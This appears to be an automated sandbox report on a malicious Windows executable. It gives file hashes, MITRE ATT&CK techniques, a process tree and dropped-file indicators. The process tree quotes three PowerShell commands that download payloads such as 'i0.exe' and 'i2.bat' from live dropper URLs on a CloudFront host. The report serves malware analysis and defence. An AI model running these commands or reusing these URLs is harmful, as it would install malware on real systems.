0c9ea8041ed332af6188a0c0f90b5d318fcd547c9588169547a97326276f49b1

General

Target

7282845f442c81d8f609bcc1a2853308.exe
Size

49KB
MD5

7282845f442c81d8f609bcc1a2853308
SHA1

ec1d936a0d8fb0da694465264e67094d0c91bd9f
SHA256

0c9ea8041ed332af6188a0c0f90b5d318fcd547c9588169547a97326276f49b1
SHA512

25792929e23d18583024eca5af6486e47f44be9332252bb302d461a645ee6822b77bf6e5b5ba135ceabe4ddd813c4e72a80910b2638caa49cfa1767cc0cd6247
SSDEEP

1536:XferrLkSRoe8C4UZsys0Dh1duFp7FI+PlI:Xfi3k+oWDBDh1duFpaWlI

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1002

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1002

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
66	1988	powershell.exe
68	3132	powershell.exe
74	4768	powershell.exe

Loads dropped DLL 1 IoCs

pid	Process
3016	7282845f442c81d8f609bcc1a2853308.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3132	powershell.exe
4768	powershell.exe
1988	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
3132	powershell.exe
3132	powershell.exe
3132	powershell.exe
4768	powershell.exe
4768	powershell.exe
4768	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 4072	3016	7282845f442c81d8f609bcc1a2853308.exe	92
PID 3016 wrote to memory of 4072	3016	7282845f442c81d8f609bcc1a2853308.exe	92
PID 3016 wrote to memory of 4072	3016	7282845f442c81d8f609bcc1a2853308.exe	92
PID 4072 wrote to memory of 1988	4072	cmd.exe	94
PID 4072 wrote to memory of 1988	4072	cmd.exe	94
PID 4072 wrote to memory of 1988	4072	cmd.exe	94
PID 4072 wrote to memory of 3132	4072	cmd.exe	104
PID 4072 wrote to memory of 3132	4072	cmd.exe	104
PID 4072 wrote to memory of 3132	4072	cmd.exe	104
PID 4072 wrote to memory of 4768	4072	cmd.exe	105
PID 4072 wrote to memory of 4768	4072	cmd.exe	105
PID 4072 wrote to memory of 4768	4072	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\7282845f442c81d8f609bcc1a2853308.exe
"C:\Users\Admin\AppData\Local\Temp\7282845f442c81d8f609bcc1a2853308.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsk1DD5.tmp\app.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:8
1⤵
PID:524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
f6e93574f0766b8f0592ed878e90a5c1

SHA1
092c08f0ef960133e529e94ae4f859fa9efdfcad

SHA256
35c99f2447e52172cb93118f50a772cdf206fa53c9ad82354cf31be86da5a298

SHA512
f437535000c95948991d88314e6883d2e541f24b50fb40693e0c026ed10f0fbf560f3b9313e496866882b7b20fa3d2127d96a69097097c0438a57eb2eeb46088

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a65382d67896e5da5014edb1adadd652

SHA1
0ed1b7619dad3781a067b7aa911ecfce5b476434

SHA256
409d24c30396be9283da4c895bccdff2b0e242b6d86da600529512856f4215bf

SHA512
fefccb9bad405ed5d7a6a944842642dfdf56ee8de5c99e1f3503b3b6f387b9e6dcc66be0cb801b8d2634810bbde81509a69e466733e8eb8dd498304c9f013990

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
3cea87b1193d73215ffb3c854e82a174

SHA1
4989fb4f211e6bb76a505f55c8019750310b0ea9

SHA256
86dfacd95be837b8f2c39a921263d231c9527485d9fd43c82b8459eeecc49d7a

SHA512
18202be6ad1cb1a69cc0650324a7b8c77991e438c2be9c5c76b34ce54e7047a9bc5b3923b8fc8c1298b6280e76e9af5027e9bff47900c90e71563f722379d9e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gllp0s40.3yh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsk1DD5.tmp\INetC.dll

Filesize
25KB

MD5
40d7eca32b2f4d29db98715dd45bfac5

SHA1
124df3f617f562e46095776454e1c0c7bb791cc7

SHA256
85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

SHA512
5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsk1DD5.tmp\app.bat

Filesize
735B

MD5
84afbd89a24af88b26d1995e56126e25

SHA1
24c322160e6043d23a1b04af559da6b457d949ae

SHA256
f4e320e1488c1c67d04d687ba4060f45c80a9ccd70788a4d28768dfc0e99cf91

SHA512
ac9cd31dee1ee8010bc1250784b81649c53efc1e91488f724b2ba4ac27de591abfc74ff733103abf62a260daf1fc8e3fd8994ae20d589140d7316e175454dd38

Download Submit
memory/1988-36-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/1988-40-0x0000000006D70000-0x0000000006D8A000-memory.dmp

Filesize
104KB

Download
memory/1988-23-0x0000000006040000-0x00000000060A6000-memory.dmp

Filesize
408KB

Download
memory/1988-24-0x00000000736DE000-0x00000000736DF000-memory.dmp

Filesize
4KB

Download
memory/1988-21-0x00000000058D0000-0x00000000058F2000-memory.dmp

Filesize
136KB

Download
memory/1988-30-0x0000000006270000-0x00000000065C4000-memory.dmp

Filesize
3.3MB

Download
memory/1988-31-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/1988-20-0x0000000005930000-0x0000000005F58000-memory.dmp

Filesize
6.2MB

Download
memory/1988-37-0x0000000006880000-0x000000000689E000-memory.dmp

Filesize
120KB

Download
memory/1988-38-0x0000000006950000-0x000000000699C000-memory.dmp

Filesize
304KB

Download
memory/1988-39-0x0000000007F50000-0x00000000085CA000-memory.dmp

Filesize
6.5MB

Download
memory/1988-22-0x0000000005FD0000-0x0000000006036000-memory.dmp

Filesize
408KB

Download
memory/1988-44-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/1988-19-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/1988-16-0x00000000736DE000-0x00000000736DF000-memory.dmp

Filesize
4KB

Download
memory/1988-17-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/1988-18-0x00000000052C0000-0x00000000052F6000-memory.dmp

Filesize
216KB

Download
memory/3132-58-0x00000000056D0000-0x0000000005A24000-memory.dmp

Filesize
3.3MB

Download
memory/3132-48-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/3132-47-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/3132-62-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/3132-46-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/4768-72-0x0000000006290000-0x00000000065E4000-memory.dmp

Filesize
3.3MB

Download
memory/4768-74-0x0000000006870000-0x00000000068BC000-memory.dmp

Filesize
304KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads